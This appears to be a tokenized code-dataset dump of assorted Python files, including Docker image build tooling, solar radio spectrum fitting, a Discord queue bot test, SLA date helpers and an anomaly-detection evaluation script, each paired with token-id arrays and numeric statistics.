[ 6738, 1334, 62, 30604, 1330, 3722, 198, 6738, 1334, 62, 30604, 13, 1069, 11755, 1330, 7824, 16922, 628 ]
4.777778
18
#!/usr/bin/env python3 # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Manages IREE Docker image definitions. Includes information on their dependency graph and GCR URL. Example usage: Rebuild the cmake image and all images that transitiviely on depend on it, tagging them with `latest`: python3 build_tools/docker/manage_images.py --build --image cmake Print out output for rebuilding the cmake image and all images that transitiviely on depend on it, but don't take side-effecting actions: python3 build_tools/docker/manage_images.py --build --image cmake --dry-run Push all `prod` images to GCR: python3 build_tools/docker/manage_images.py --push --tag prod --images all Rebuild and push all images and update references to them in the repository: python3 build_tools/docker/manage_images.py --push --images all --update-references """ import argparse import fileinput import os import posixpath import re import subprocess import sys IREE_GCR_URL = 'gcr.io/iree-oss/' DOCKER_DIR = 'build_tools/docker/' # Map from image names to images that they depend on. IMAGES_TO_DEPENDENCIES = { 'base': [], 'bazel': ['base', 'util'], 'bazel-python': ['bazel'], 'bazel-tensorflow': ['bazel-python'], 'bazel-tensorflow-nvidia': ['bazel-tensorflow-vulkan'], 'bazel-tensorflow-swiftshader': ['bazel-tensorflow-vulkan', 'swiftshader'], 'bazel-tensorflow-vulkan': ['bazel-tensorflow'], 'cmake': ['base', 'util'], 'cmake-android': ['cmake', 'util'], 'cmake-python': ['cmake'], 'cmake-python-nvidia': ['cmake-python-vulkan'], 'cmake-python-swiftshader': ['cmake-python-vulkan', 'swiftshader'], 'cmake-python-vulkan': ['cmake-python'], 'rbe-toolchain': [], 'swiftshader': ['cmake'], 'util': [], } IMAGES_TO_DEPENDENT_IMAGES = {k: [] for k in IMAGES_TO_DEPENDENCIES} for image, dependencies in IMAGES_TO_DEPENDENCIES.items(): for dependency in dependencies: IMAGES_TO_DEPENDENT_IMAGES[dependency].append(image) IMAGES_HELP = [f'`{name}`' for name in IMAGES_TO_DEPENDENCIES] IMAGES_HELP = f'{", ".join(IMAGES_HELP)} or `all`' def parse_arguments(): """Parses command-line options.""" parser = argparse.ArgumentParser( description="Build IREE's Docker images and optionally push them to GCR.") parser.add_argument( '--images', '--image', type=str, required=True, action='append', help=f'Name of the image to build: {IMAGES_HELP}.') parser.add_argument( '--tag', type=str, default='latest', help='Tag for the images to build. Defaults to `latest` (which is good ' 'for testing changes in a PR). Use `prod` to update the images that the ' 'CI caches.') parser.add_argument( '--pull', action='store_true', help='Pull the specified image before building.') parser.add_argument( '--build', action='store_true', help='Build new images from the current Dockerfiles.') parser.add_argument( '--push', action='store_true', help='Push the built images to GCR. 
Requires gcloud authorization.') parser.add_argument( '--update_references', '--update-references', action='store_true', help='Update all references to the specified images to point at the new' ' digest.') parser.add_argument( '--dry_run', '--dry-run', '-n', action='store_true', help='Print output without building or pushing any images.') args = parser.parse_args() for image in args.images: if image == 'all': # Sort for a determinstic order args.images = sorted(IMAGES_TO_DEPENDENCIES.keys()) elif image not in IMAGES_TO_DEPENDENCIES: raise parser.error('Expected --image to be one of:\n' f' {IMAGES_HELP}\n' f'but got `{image}`.') return args if __name__ == '__main__': args = parse_arguments() # Ensure the user has the correct authorization if they try to push to GCR. if args.push: if stream_command(['which', 'gcloud']) != 0: print('gcloud not found.' ' See https://cloud.google.com/sdk/install for installation.') sys.exit(1) check_stream_command(['gcloud', 'auth', 'configure-docker'], dry_run=args.dry_run) images_to_process = get_ordered_images_to_process(args.images) print(f'Also processing dependent images. Will process: {images_to_process}') for image in images_to_process: print(f'Processing image {image}') image_name = posixpath.join(IREE_GCR_URL, image) image_tag = f'{image_name}:{args.tag}' image_path = os.path.join(DOCKER_DIR, image) if args.pull: check_stream_command(['docker', 'pull', image_tag], dry_run=args.dry_run) if args.build: check_stream_command(['docker', 'build', '--tag', image_tag, image_path], dry_run=args.dry_run) if args.push: check_stream_command(['docker', 'push', image_tag], dry_run=args.dry_run) if args.update_references: digest = get_repo_digest(image_tag) # Just hardcode this oddity if image == 'rbe-toolchain': update_rbe_reference(digest, dry_run=args.dry_run) update_references(image_name, digest, dry_run=args.dry_run)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 2, 15069, 12131, 3012, 11419, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2...
2.613381
2,227
import numpy as np # import sys import math import os, sys, platform import astropy.units as u from sunpy import map as smap from astropy.coordinates import SkyCoord from suncasa.io import ndfits import lmfit from astropy.time import Time import matplotlib.pyplot as plt import matplotlib.colors as colors import matplotlib.colorbar as colorbar from suncasa.utils import mstools from suncasa.utils import qlookplot as ql from mpl_toolkits.axes_grid1 import make_axes_locatable from tqdm import tqdm from astropy.io import fits import numpy.ma as ma sys.path.append(os.path.dirname(os.path.realpath(__file__))) import gstools # name of the fast gyrosynchrotron codes shared library if platform.system() == 'Linux' or platform.system() == 'Darwin': libname = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'binaries/MWTransferArr.so') if platform.system() == 'Windows': libname = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'binaries/MWTransferArr64.dll') def mwspec2min_1src(params, freqghz, tb=None, tb_err=None, arcsec2cm=0.725e8, showplt=False): # params are defined by lmfit.Paramters() ''' params: parameters defined by lmfit.Paramters() freqghz: frequencies in GHz ssz: pixel size in arcsec tb: reference brightness temperature in K tb_err: uncertainties of reference brightness temperature in K ''' from scipy import interpolate GET_MW = gstools.initGET_MW(libname) # load the library ssz = float(params['ssz'].value) # # source area in arcsec^2 depth = float(params['depth'].value) # total source depth in arcsec Bmag = float(params['Bmag'].value) # magnetic field strength in G Tth = float(params['Tth'].value) # thermal temperature in MK nth = float(params['nth'].value) # thermal density in 1e10 cm^{-3} nrlh = 10. ** float(params['lognrlh'].value) # total nonthermal density above 0.1 MeV delta = float(params['delta'].value) # powerlaw index theta = float(params['theta'].value) # viewing angle in degrees Emin = float(params['Emin'].value) # low energy cutoff of nonthermal electrons in MeV Emax = float(params['Emax'].value) # high energy cutoff of nonthermal electrons in MeV E_hi = 0.1 nrl = nrlh * (Emin ** (1. - delta) - Emax * (1. - delta)) / (E_hi ** (1. - delta) - Emax ** (1. - delta)) Nf = 100 # number of frequencies NSteps = 1 # number of nodes along the line-of-sight N_E = 15 # number of energy nodes N_mu = 15 # number of pitch-angle nodes Lparms = np.zeros(11, dtype='int32') # array of dimensions etc. 
Lparms[0] = NSteps Lparms[1] = Nf Lparms[2] = N_E Lparms[3] = N_mu Rparms = np.zeros(5, dtype='double') # array of global floating-point parameters Rparms[0] = ssz * arcsec2cm ** 2 # Area, cm^2 # Rparms[0] = 1e20 # area, cm^2 Rparms[1] = 1e9 # starting frequency to calculate spectrum, Hz Rparms[2] = 0.02 # logarithmic step in frequency Rparms[3] = 12 # f^C Rparms[4] = 12 # f^WH ParmLocal = np.zeros(24, dtype='double') # array of voxel parameters - for a single voxel ParmLocal[0] = depth * arcsec2cm / NSteps # voxel depth, cm ParmLocal[1] = Tth * 1e6 # T_0, K ParmLocal[2] = nth * 1e10 # n_0 - thermal electron density, cm^{-3} ParmLocal[3] = Bmag # B - magnetic field, G Parms = np.zeros((24, NSteps), dtype='double', order='F') # 2D array of input parameters - for multiple voxels for i in range(NSteps): Parms[:, i] = ParmLocal # most of the parameters are the same in all voxels # if NSteps > 1: # Parms[4, i] = 50.0 + 30.0 * i / (NSteps - 1) # the viewing angle varies from 50 to 80 degrees along the LOS # else: # Parms[4, i] = 50.0 # the viewing angle varies from 50 to 80 degrees along the LOS Parms[4, i] = theta # parameters of the electron distribution function n_b = nrl # n_b - nonthermal electron density, cm^{-3} mu_c = np.cos(np.pi * 70 / 180) # loss-cone boundary dmu_c = 0.2 # Delta_mu E_arr = np.logspace(np.log10(Emin), np.log10(Emax), N_E, dtype='double') # energy grid (logarithmically spaced) mu_arr = np.linspace(-1.0, 1.0, N_mu, dtype='double') # pitch-angle grid f0 = np.zeros((N_E, N_mu), dtype='double') # 2D distribution function array - for a single voxel # computing the distribution function (equivalent to PLW & GLC) A = n_b / (2.0 * np.pi) * (delta - 1.0) / (Emin ** (1.0 - delta) - Emax ** (1.0 - delta)) B = 0.5 / (mu_c + dmu_c * np.sqrt(np.pi) / 2 * math.erf((1.0 - mu_c) / dmu_c)) for i in range(N_E): for j in range(N_mu): amu = abs(mu_arr[j]) f0[i, j] = A * B * E_arr[i] ** (-delta) * (1.0 if amu < mu_c else np.exp(-((amu - mu_c) / dmu_c) ** 2)) f_arr = np.zeros((N_E, N_mu, NSteps), dtype='double', order='F') # 3D distribution function array - for multiple voxels for k in range(NSteps): f_arr[:, :, k] = f0 # electron distribution function is the same in all voxels RL = np.zeros((7, Nf), dtype='double', order='F') # input/output array # calculating the emission for array distribution (array -> on) res = GET_MW(Lparms, Rparms, Parms, E_arr, mu_arr, f_arr, RL) if res: # retrieving the results f = RL[0] I_L = RL[5] I_R = RL[6] if showplt: import matplotlib.pyplot as plt fig, ax = plt.subplots(1, 1) ax.plot(f, I_L + I_R) ax.set_xscale('log') ax.set_yscale('log') ax.set_title('Total intensity (array)') ax.set_xlabel('Frequency, GHz') ax.set_ylabel('Intensity, sfu') flx_model = I_L + I_R flx_model = np.nan_to_num(flx_model) + 1e-11 logf = np.log10(f) logflx_model = np.log10(flx_model) logfreqghz = np.log10(freqghz) interpfunc = interpolate.interp1d(logf, logflx_model, kind='linear') logmflx = interpfunc(logfreqghz) mflx = 10. ** logmflx mtb = sfu2tb(np.array(freqghz) * 1.e9, mflx, ssz) else: print("Calculation error!") if tb is None: return mtb if tb_err is None: # return mTb - Tb return mtb - tb # wt = 1./flx_err # wt = 1./(Tb_err/Tb/np.log(10.)) # residual = np.abs((logmTb - np.log10(Tb))) * wt # residual = np.abs((mflx - flx)) * wt residual = (mtb - tb) / tb_err return residual
[ 11748, 299, 32152, 355, 45941, 198, 2, 1330, 25064, 198, 11748, 10688, 198, 11748, 28686, 11, 25064, 11, 3859, 198, 11748, 6468, 28338, 13, 41667, 355, 334, 198, 6738, 4252, 9078, 1330, 3975, 355, 895, 499, 198, 6738, 6468, 28338, 13, ...
2.260137
2,910
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 11, 15720, 602, 628 ]
2.891892
37
import io
import sys
import unittest
import asyncio
import random
from contextlib import redirect_stdout
from .utils import *

from queuebot import QueueBot, QueueConfig, DiscordUser

config = {
    "SECRET_TOKEN": "NOONEWILLEVERGUESSTHISSUPERSECRETSTRINGMWAHAHAHA",
    "TA_ROLES": ["UGTA"],
    "LISTEN_CHANNELS": ["join-queue"],
    "CHECK_VOICE_WAITING": "False",
    "VOICE_WAITING": "waiting-room",
    "ALERT_ON_FIRST_JOIN": "True",
    "VOICE_OFFICES": ["Office Hours Room 1", "Office Hours Room 2", "Office Hours Room 3"],
    "ALERTS_CHANNEL": "queue-alerts",
}

config = QueueConfig(config, test_mode=True)

# TODO Comment each test case

if __name__ == '__main__':
    unittest.main()
[ 11748, 33245, 198, 11748, 25064, 198, 11748, 555, 715, 395, 198, 11748, 30351, 952, 198, 11748, 4738, 198, 6738, 4732, 8019, 1330, 18941, 62, 19282, 448, 198, 6738, 764, 26791, 1330, 1635, 198, 198, 6738, 16834, 13645, 1330, 4670, 518, ...
2.587361
269
""" .. module:: aws_utilities_cli.iam :platform: OS X :synopsis: Small collection of utilities that use the Amazon Web Services (AWS) SDK .. moduleauthor:: dataday """ __all__ = ['generate_identity', 'generate_policy']
[ 37811, 198, 492, 8265, 3712, 3253, 82, 62, 315, 2410, 62, 44506, 13, 1789, 198, 220, 220, 220, 1058, 24254, 25, 7294, 1395, 198, 220, 220, 220, 1058, 28869, 24608, 25, 10452, 4947, 286, 20081, 326, 198, 220, 220, 220, 220, 220, 220,...
2.843373
83
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import numpy as np
from tests.common.tensorio import compare_tensor
from tests.common.test_op import triangle
from akg.utils import kernel_exec as utils
from tests.common.gen_random import random_gaussian
[ 2, 15069, 13130, 43208, 21852, 1766, 1539, 12052, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198...
3.845411
207
# Generated by Django 2.0.3 on 2018-05-14 21:06

from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 362, 13, 15, 13, 18, 319, 2864, 12, 2713, 12, 1415, 2310, 25, 3312, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
#
# The tuner class to initiate the empirical performance tuning process
#

import re, sys, os

from orio.main.util.globals import *
import orio.main.dyn_loader, orio.main.tspec.tspec, orio.main.tuner.ptest_codegen, orio.main.tuner.ptest_driver

#--------------------------------------------------

# the name of the module containing various search algorithms
SEARCH_MOD_NAME = 'orio.main.tuner.search'

#--------------------------------------------------
[ 2, 198, 2, 383, 6278, 263, 1398, 284, 22118, 262, 21594, 2854, 24549, 1429, 198, 2, 198, 198, 11748, 302, 11, 25064, 11, 28686, 198, 198, 6738, 22812, 78, 13, 12417, 13, 22602, 13, 4743, 672, 874, 1330, 1635, 198, 11748, 22812, 78, ...
3.55814
129
from transformer import * from logger import logger def verify_data(collection): 'verify the data format is correct or not.' for d in collection.find(): info = d.get('d').get('info') if len(info) <12 and info[0] != '1': logger.error('invalid patient info:' + d['_id']+str(info)) if len(d.get('d').get('doctor_advice')) == 0: logger.error('invalid doctor advice:' + d['_id']) else: has_long = False has_short = False for a in d.get('d').get('doctor_advice'): if len(a) != 18: logger.error('invalid doctor advice:' + d['_id']) logger.error("invalid doctor advice: " + a) if a[3] == '': has_long = True else: has_short = True if not (has_long and has_short): logger.error('invalid doctor advice: ' + d['_id'] + ', long/short: {}/{}'.format(has_long, has_short) ) def get_info(collection): 'count PE' for d in collection.find(): if len(d.get('d').get('doctor_advice')) == 0: print('invalid doctor advice:' + d['_id']) else: one_p = split_all_ad(d) print(one_p) break def main(): 'main entry' from datetime import datetime from db import paients_source start = datetime.now() print('hello..') # verify_data(paients_source) # get_info(collection) find_missing() print(datetime.now() - start) if __name__ == '__main__': main()
[ 6738, 47385, 1330, 1635, 198, 6738, 49706, 1330, 49706, 198, 198, 4299, 11767, 62, 7890, 7, 43681, 2599, 198, 220, 220, 220, 705, 332, 1958, 262, 1366, 5794, 318, 3376, 393, 407, 2637, 198, 220, 220, 220, 329, 288, 287, 4947, 13, 19...
2.056774
775
#!/usr/bin/env python import os import re import subprocess import sys # version -> classifier # '' means default classifier cuda_vers = { '11.2': ['cuda11', ''] } def check_classifier(classifier): ''' Check the mapping from cuda version to jar classifier. Used by maven build. ''' cu_ver = detect_cuda_ver() classifier_list = cuda_vers[cu_ver] if classifier not in classifier_list: raise Exception("Jar classifier '{}' mismatches the 'nvcc' version {} !".format(classifier, cu_ver)) def get_supported_vers(): ''' Get the supported cuda versions. ''' return cuda_vers.keys() def get_supported_vers_str(): ''' Get the supported cuda versions and join them as a string. Used by shell script. ''' return ' '.join(cuda_vers.keys()) def detect_cuda_ver(): ''' Detect the cuda version from current nvcc tool. ''' nvcc_ver_bin = subprocess.check_output('nvcc --version', shell=True) nvcc_ver = re.search('release ([.0-9]+), V([.0-9]+)', str(nvcc_ver_bin)).group(1) if nvcc_ver in get_supported_vers(): return nvcc_ver else: raise Exception("Unsupported cuda version: {}, Please check your 'nvcc' version.".format(nvcc_ver)) if __name__ == "__main__": num_args = len(sys.argv) action = sys.argv[1].lower() if num_args > 1 else 'l' if action =='c': classifier = sys.argv[2].lower() if num_args > 2 else '' check_classifier(classifier) elif action == 'd': print(detect_cuda_ver()) elif action == 'g': print(get_classifier()) elif action == 'l': print(get_supported_vers_str()) else: print("Unsupported action: " + action)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 11748, 28686, 198, 11748, 302, 198, 11748, 850, 14681, 198, 11748, 25064, 198, 198, 2, 2196, 4613, 1398, 7483, 198, 2, 10148, 1724, 4277, 1398, 7483, 198, 66, 15339, 62, 690, 796, 1391...
2.450785
701
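A self-contained illustration of the `release ..., V...` parsing used by `detect_cuda_ver` above; the banner string is an assumed example of `nvcc --version` output, not captured from a real run.

import re

# Example nvcc banner (assumed for illustration; real output may differ slightly).
nvcc_banner = ("nvcc: NVIDIA (R) Cuda compiler driver\n"
               "Cuda compilation tools, release 11.2, V11.2.67")

match = re.search('release ([.0-9]+), V([.0-9]+)', nvcc_banner)
print(match.group(1))  # 11.2 -> the key looked up in the cuda_vers mapping
print(match.group(2))  # 11.2.67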
# Generated by Django 3.0.2 on 2020-03-29 19:11

from django.db import migrations
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 17, 319, 12131, 12, 3070, 12, 1959, 678, 25, 1157, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.766667
30
import pytz from datetime import date, time, datetime, timedelta from django.core.exceptions import ValidationError from django.db import models START_HOUR = 9 END_HOUR = 18 workingHours = END_HOUR - START_HOUR def findExpiryDate(sla): """ Finds the expiry date for a ticket based on 1. Severity of the ticket 2. Date of issue """ now = datetime.now() flag = 1 # if ticket is received today between 00:00 hours to Start_Hour # we reset the flag if now.hour < START_HOUR: flag = 0 # if ticket is received today between office hours then # we simply deduct working hours left today from sla if START_HOUR < now.hour < END_HOUR: hoursLeftToday = END_HOUR - sla sla -= hoursLeftToday tomorrow = date.today() + timedelta(days=flag) shiftTime = time(START_HOUR,0,0) dt = datetime.combine(tomorrow, shiftTime, pytz.utc) dt = adjust_Weekends_And_Holidays(dt) # adjust incase we hit a weekend # now we find the office days and office hours # we would need to complete the sla days, hours = divmod(sla, workingHours) dt += timedelta(hours=hours) dt = adjust_Weekends_And_Holidays(dt, days=days) # adjust incase we hit a weekend return dt def isWeekend(dt): """Finds if a date lies on a weekend or not. Returns a boolean""" if 0 < dt.weekday() < 6: return False else: return True def isHoliday(dt): """Finds if a date lies on a holiday or not. Returns a boolean""" return Holiday.objects.filter(day=dt.date()).exists() def adjust_Weekends_And_Holidays(dt, days=0): """ Adjust the datetime to a future datetime accomodating for 1. days needed 2. skipping Weekends """ while isWeekend(dt) or isHoliday(dt): dt += timedelta(days=1) while days: dt += timedelta(days=1) if isWeekend(dt) or isHoliday(dt): continue else: days -= 1 return dt
[ 11748, 12972, 22877, 198, 6738, 4818, 8079, 1330, 3128, 11, 640, 11, 4818, 8079, 11, 28805, 12514, 198, 198, 6738, 42625, 14208, 13, 7295, 13, 1069, 11755, 1330, 3254, 24765, 12331, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 628, 19...
2.53129
783
from hypothesis import given

from tests.port_tests.hints import (PortedBoundingBox,
                                    PortedPoint)
from tests.utils import equivalence

from . import strategies
[ 6738, 14078, 1330, 1813, 198, 198, 6738, 5254, 13, 634, 62, 41989, 13, 71, 29503, 1330, 357, 47, 9741, 33, 9969, 14253, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, ...
2.525641
78
import pytest
# import station
[ 11748, 12972, 9288, 198, 2, 1330, 4429, 628, 198 ]
3.666667
9
#!/usr/bin/env python3

import logging

import torch.nn as nn
from fairseq import checkpoint_utils
from fairseq.models import BaseFairseqModel, register_model
from pytorch_translate import rnn
from pytorch_translate.rnn import (
    LSTMSequenceEncoder,
    RNNDecoder,
    RNNEncoder,
    RNNModel,
    base_architecture,
)
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask


logger = logging.getLogger(__name__)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 18931, 198, 198, 11748, 28034, 13, 20471, 355, 299, 77, 198, 6738, 3148, 41068, 1330, 26954, 62, 26791, 198, 6738, 3148, 41068, 13, 27530, 1330, 7308, 30099, 41068, 17633...
2.736196
163
from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs

__all__ = [
    "ess",
    "ess_sampling",
    "bsgda",
    "computing_sets",
    "solving_set_covering",
    "cheby_coeff4ideal_band_pass",
    "estimate_lk",
    "rsbs",
    "fastgsss",
    # reconstruction
    "recon_fastssss",
    "recon_bsgda",
    "recon_ess",
    "recon_rsbs",
    # utils
    "construct_sampling_matrix",
    "construct_hth",
    "construct_dia",
]
[ 6738, 47540, 26791, 1330, 5678, 62, 67, 544, 11, 5678, 62, 71, 400, 11, 5678, 62, 37687, 11347, 62, 6759, 8609, 198, 6738, 764, 1443, 70, 6814, 1330, 275, 45213, 6814, 11, 14492, 62, 28709, 11, 8195, 62, 1443, 70, 6814, 11, 18120, ...
2.255663
309
import tempfile
import os
import sys
sys.path.insert(1,"../../")

import h2o
from h2o.estimators import H2OGeneralizedLinearEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing, compare_params

if __name__ == "__main__":
    pyunit_utils.standalone_test(mojo_model_test_binomial)
    pyunit_utils.standalone_test(mojo_model_test_multinomial)
    pyunit_utils.standalone_test(mojo_model_test_regression)
    pyunit_utils.standalone_test(mojo_model_test_ordinal)
else:
    mojo_model_test_binomial()
    mojo_model_test_multinomial()
    mojo_model_test_regression()
    mojo_model_test_ordinal()
[ 11748, 20218, 7753, 198, 11748, 28686, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 28463, 7, 16, 553, 40720, 40720, 4943, 198, 198, 11748, 289, 17, 78, 198, 6738, 289, 17, 78, 13, 395, 320, 2024, 1330, 367, 17, 7730, 877, 282, 1143...
2.59387
261
# (c) Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Test base class of 3PAR Client."""

import os
import sys
import unittest
import subprocess
import time
import inspect
from pytest_testconfig import config
import datetime
from functools import wraps

from hpe3parclient import client, file_client

TIME = datetime.datetime.now().strftime('%H%M%S')

try:
    # For Python 3.0 and later
    from urllib.parse import urlparse
except ImportError:
    # Fall back to Python 2's urllib2
    from urlparse import urlparse
[ 2, 357, 66, 8, 15069, 1853, 30446, 15503, 6400, 446, 14973, 7712, 18470, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, ...
3.576667
300
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.

""" Test Driver HDF5 """

import os
import pathlib
import shutil
import tempfile
import unittest
import warnings
from test import QiskitNatureTestCase
from test.drivers.second_quantization.test_driver import TestDriver

from qiskit_nature.drivers.second_quantization import HDF5Driver
from qiskit_nature.drivers import QMolecule
from qiskit_nature.properties.second_quantization.electronic import ElectronicStructureDriverResult


if __name__ == "__main__":
    unittest.main()
[ 2, 770, 2438, 318, 636, 286, 1195, 1984, 270, 13, 198, 2, 198, 2, 357, 34, 8, 15069, 19764, 2864, 11, 33160, 13, 198, 2, 198, 2, 770, 2438, 318, 11971, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 13, 921, 743, 198, 2, 7330...
3.57037
270
######################################################################## # import default libraries ######################################################################## import os import csv import sys import gc ######################################################################## ######################################################################## # import additional libraries ######################################################################## import numpy as np import scipy.stats import torch import torch.nn as nn # from import from tqdm import tqdm from sklearn import metrics try: from sklearn.externals import joblib except: import joblib # original lib import common as com from pytorch_model import AutoEncoder ######################################################################## ######################################################################## # load parameter.yaml ######################################################################## param = com.yaml_load() ####################################################################### ######################################################################## # output csv file ######################################################################## ######################################################################## ######################################################################## # main 01_test.py ######################################################################## if __name__ == "__main__": #################################################################### # set device #################################################################### device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print("device : {}".format(device)) #################################################################### # check mode # "development": mode == True # "evaluation": mode == False mode = com.command_line_chk() if mode is None: sys.exit(-1) # make output result directory os.makedirs(param["result_directory"], exist_ok=True) # load base directory dirs = com.select_dirs(param=param, mode=mode) # initialize lines in csv for AUC and pAUC csv_lines = [] if mode: performance_over_all = [] # loop of the base directory for idx, target_dir in enumerate(dirs): print("\n===========================") print("[{idx}/{total}] {target_dir}".format(target_dir=target_dir, idx=idx+1, total=len(dirs))) machine_type = os.path.split(target_dir)[1] print("============== MODEL LOAD ==============") # load model file model_file = "{model}/model_{machine_type}.hdf5".format(model=param["model_directory"], machine_type=machine_type) if not os.path.exists(model_file): com.logger.error("{} model not found ".format(machine_type)) sys.exit(-1) input_channel = param["feature"]["n_mels"] * param["feature"]["n_frames"] model = AutoEncoder(input_channel).to(device) model.eval() if device.type == "cuda": model.load_state_dict(torch.load(model_file)) elif device.type == "cpu": model.load_state_dict(torch.load(model_file, map_location=torch.device("cpu"))) # load anomaly score distribution for determining threshold score_distr_file_path = "{model}/score_distr_{machine_type}.pkl".format(model=param["model_directory"], machine_type=machine_type) shape_hat, loc_hat, scale_hat = joblib.load(score_distr_file_path) # determine threshold for decision decision_threshold = scipy.stats.gamma.ppf(q=param["decision_threshold"], a=shape_hat, loc=loc_hat, scale=scale_hat) if mode: # results for each machine type csv_lines.append([machine_type]) 
csv_lines.append(["section", "domain", "AUC", "pAUC", "precision", "recall", "F1 score"]) performance = [] dir_names = ["source_test", "target_test"] for dir_name in dir_names: #list machine id section_names = com.get_section_names(target_dir, dir_name=dir_name) for section_name in section_names: # load test file files, y_true = com.file_list_generator(target_dir=target_dir, section_name=section_name, dir_name=dir_name, mode=mode) # setup anomaly score file path anomaly_score_csv = "{result}/anomaly_score_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"], machine_type=machine_type, section_name=section_name, dir_name=dir_name) anomaly_score_list = [] # setup decision result file path decision_result_csv = "{result}/decision_result_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"], machine_type=machine_type, section_name=section_name, dir_name=dir_name) decision_result_list = [] print("\n============== BEGIN TEST FOR A SECTION ==============") y_pred = [0. for k in files] for file_idx, file_path in tqdm(enumerate(files), total=len(files)): try: data = com.file_to_vectors(file_path, n_mels=param["feature"]["n_mels"], n_frames=param["feature"]["n_frames"], n_fft=param["feature"]["n_fft"], hop_length=param["feature"]["hop_length"], power=param["feature"]["power"]) except: com.logger.error("File broken!!: {}".format(file_path)) data = torch.tensor(data, dtype=torch.float32).to(device) reconst = model(data) mseloss = nn.functional.mse_loss(data.detach(), reconst.detach()) y_pred[file_idx] = mseloss.item() # store anomaly scores anomaly_score_list.append([os.path.basename(file_path), y_pred[file_idx]]) # store decision results if y_pred[file_idx] > decision_threshold: decision_result_list.append([os.path.basename(file_path), 1]) else: decision_result_list.append([os.path.basename(file_path), 0]) # output anomaly scores save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list) com.logger.info("anomaly score result -> {}".format(anomaly_score_csv)) # output decision results save_csv(save_file_path=decision_result_csv, save_data=decision_result_list) com.logger.info("decision result -> {}".format(decision_result_csv)) if mode: # append AUC and pAUC to lists auc = metrics.roc_auc_score(y_true, y_pred) p_auc = metrics.roc_auc_score(y_true, y_pred, max_fpr=param["max_fpr"]) tn, fp, fn, tp = metrics.confusion_matrix(y_true, [1 if x > decision_threshold else 0 for x in y_pred]).ravel() prec = tp / np.maximum(tp + fp, sys.float_info.epsilon) recall = tp / np.maximum(tp + fn, sys.float_info.epsilon) f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon) csv_lines.append([section_name.split("_", 1)[1], dir_name.split("_", 1)[0], auc, p_auc, prec, recall, f1]) performance.append([auc, p_auc, prec, recall, f1]) performance_over_all.append([auc, p_auc, prec, recall, f1]) com.logger.info("AUC : {}".format(auc)) com.logger.info("pAUC : {}".format(p_auc)) com.logger.info("precision : {}".format(prec)) com.logger.info("recall : {}".format(recall)) com.logger.info("F1 score : {}".format(f1)) print("\n============ END OF TEST FOR A SECTION ============") if mode: # calculate averages for AUCs and pAUCs amean_performance = 